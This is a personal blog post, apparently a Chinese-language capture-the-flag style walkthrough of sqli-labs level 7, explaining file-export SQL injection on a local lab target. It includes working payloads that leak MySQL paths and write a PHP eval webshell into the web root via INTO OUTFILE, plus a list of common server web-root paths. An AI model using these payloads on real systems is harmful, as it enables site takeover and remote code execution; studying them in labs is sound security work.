<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="Life isn&#39;t about waiting for the storm to pass. It&#39;s about learning to dance in the rain">
    

    <!--Author-->
    
        <meta name="author" content="Reteja">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="Rejeta&#39;s Blog"/>
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="Life isn&#39;t about waiting for the storm to pass. It&#39;s about learning to dance in the rain" />
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="Rejeta&#39;s Blog"/>

    <!--Type page-->
    
        <meta property="og:type" content="website" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>Rejeta&#39;s Blog</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 5.2.0"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2020/11/18/sql-labs%E9%80%9A%E5%85%B3%EF%BC%88sql-7%EF%BC%89/">
                Untitled
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2020-11-18</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <h1 id="sql-labs通关（sql-7）"><a href="#sql-labs通关（sql-7）" class="headerlink" title="sql-labs通关（sql-7）"></a>sql-labs通关（sql-7）</h1><p>打开题目看到了熟悉的界面，输入探测代码，题目回显给出了提示<br><img src="https://diviad-nick.github.io/image/sql_7_1.png"><br>这是一种特殊的注入方式，“导出文件GET字符型注入”<br>也可以说是字符型注入的一种变种，通过使用sql命令，将查询结果导出到文件中。比如比较常见的一句话木马导出到php文件中。<br>使用这种注入方式我们不仅需要构造语句来注入，还要获取到网站在服务器中的绝对路径，获取绝对路径的方式大致有两种：</p>
<p>1.靠经验猜。<br>　　大部分的小网站通常直接使用集成的网站环境，如phpstudy。同时还不对目录名称进行修改，直接使用网站原有的目录，还有的虽然不使用网站原有的目录，但是使用的目录很容易被猜到。针对这些网站，我们可以直接猜到网站在服务器中的路径。下面列出常见的几个路径：<br>winserver服务器一般路径如下：<br> （1）c:/inetpub/wwwroot/<br>linux中nginx服务器一般路径如下：<br> （2）/usr/local/nginx/html<br> （3）/home/wwwroot/default<br> （4）/usr/share/nginx<br> （5）/var/www/htm<br> apache服务器一般路径如下<br> （6）/var/www/htm<br> （7）/var/www/html/htdocs</p>
<p> 2.注入获取法。<br>下面介绍两个函数：<br>@@datadir 读取数据库路径<br>@@basedir MYSQL 获取安装路径<br>　　这两个东西可以帮助我们获取到sql注入的网站在服务器中的绝对路径，但是，这个方法不一定好用，因为这两个东西使用的时候需要对方网站做出回显。也就是说，这两个东西虽然好用，但是面对这个题目，无论输入什么都没有回显的这种状况，就无能为力了<br>　　现在演示一下这两个东西的使用方式，首先打开第一关（sql-labs1）<br>输入如下payload，我们就可以拿到绝对路径了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.23.130&#x2F;sqli&#x2F;sqlilabs&#x2F;Less-1&#x2F;?id&#x3D;1&#39; union select null,@@datadir,@@basedir %23</span><br></pre></td></tr></table></figure>
<p>我拿到了我的靶场的绝对路径：<br>C:\phpstudy_pro\Extensions\MySQL5.7.26\data<br>C:\phpstudy_pro\Extensions\MySQL5.7.26\</p>
<p>接下来回到第七关，我们已经拿到了绝对路径，现在就是通过注入的方式将攻击代码写入或者写出网站，那么我们就会遇到另一个问题，权限管理</p>
<p>众所周知，通常网站的权限管理都是非常严格的，我们想要通过注入的方式来写入或写出攻击代码，但是作为访问者的我们真的有对网站绝对路径的读写权限吗？这是我们需要深思的问题，好在这道题目给了我们读写的权限，也就是刚开始探测的时候，我们探测到的内个标志着“导出文件GET字符型注入”的东西 <font color=#fff0000 size=3>outfile</font></p>
<p>接下来就是构造语句了，通过构造sql语句来对网站写入一句话木马，这是当前的攻击思路<br>尝试写入一句话：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.23.130&#x2F;sqli&#x2F;sqlilabs&#x2F;Less-7&#x2F;?id&#x3D;1&quot;)) union select &#39;&lt;?php @eval($_REQUEST[&#39;cmd&#39;]) ?&gt;&#39; into outfile &quot;C:\\phpstudy_pro\\WWW\\sqli\\sqlilabs\\Less-7\\b.php&quot; %23</span><br></pre></td></tr></table></figure>
<p>如果没写入的话，在mysql的设置文件my.ini中添加下面的代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">secure_file_priv&#x3D;&quot;&#x2F;&quot;</span><br></pre></td></tr></table></figure>

<p>成功写入文件之后，我们就可以使用菜刀或者蚁剑连接我们的一句话木马（前提是能够访问一句话木马）<br>连接完成，我们成功完成了这一关</p>

    </div>

    

    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    This theme was developed by <a target="_blank" rel="noopener" href="https://github.com/klugjo">Jonathan Klughertz</a>. The source code is available on Github. Create Websites. Make Magic.
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2020/11/18/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%20Knife1/">Untitled</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2020/11/18/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%20lovesql/">Untitled</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2020/11/18/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%20secret%20file/">Untitled</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2020/11/18/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%20upload/">Untitled</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-alpha-dust">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://twitter.com/?lang=en">
                            <span class="footer-icon-container">
                                <i class="fa fa-twitter"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.facebook.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-facebook"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.instagram.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-instagram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://dribbble.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-dribbble"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://telegram.org/">
                            <span class="footer-icon-container">
                                <i class="fa fa-telegram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.behance.net/">
                            <span class="footer-icon-container">
                                <i class="fa fa-behance"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://500px.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-500px"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:test@example.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @Untitled. All right reserved | Design & Hexo <a target="_blank" rel="noopener" href="http://www.codeblocq.com/">Jonathan Klughertz</a>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>